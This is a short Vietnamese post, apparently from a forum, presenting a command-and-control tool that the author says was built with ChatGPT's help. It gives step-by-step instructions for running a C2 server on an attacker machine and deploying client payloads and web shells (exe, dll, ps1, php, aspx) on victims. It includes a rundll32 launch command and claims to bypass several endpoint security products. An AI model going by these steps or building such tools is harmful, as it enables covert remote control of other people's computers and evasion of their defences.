Công cụ này mình nhờ chatgpt và dựa trên một số tình huống trong quá trình làm việc thực tế.
B1:
chạy c2_server.exe trên máy attacker, sau khi chạy xong thì server sẽ start dịch vụ web trên port 8000
B2:
mở trình duyệt web để truy cập vào http://ip_attacker:8000 (sử dụng phần này để control victim nếu có kết nối
B3:
chạy các file c2_client tương ứng dưới client (theo từng ngữ cảnh thử nghiệm: exe, dll, ps1, php, aspx)
B4:
để chạy file dll thì theo lệnh sau: rundll32.exe c2_client.dll,Runme
B5:
để chạy file php, aspx thì dựng web server, sau đó mỗi lần cần kết nối+cần thực hiện lệnh thì truy cập từ attacker vào victim với url: http://victim/c2_client.php hoặc http://victim/c2_client.aspx
Link github: https://github.com/syvtit/learning/tree/50fde405e2a2361dd080d8b929b040eb94b3ee15/httpConnection
Mình có thử nghiệm kịch bản này trên endpoint với các giải pháp bảo vệ như: TrendMicro, PaloAlto, Microsoft (sử dụng bản miễn phí cá nhân) thì vẫn bị bypass.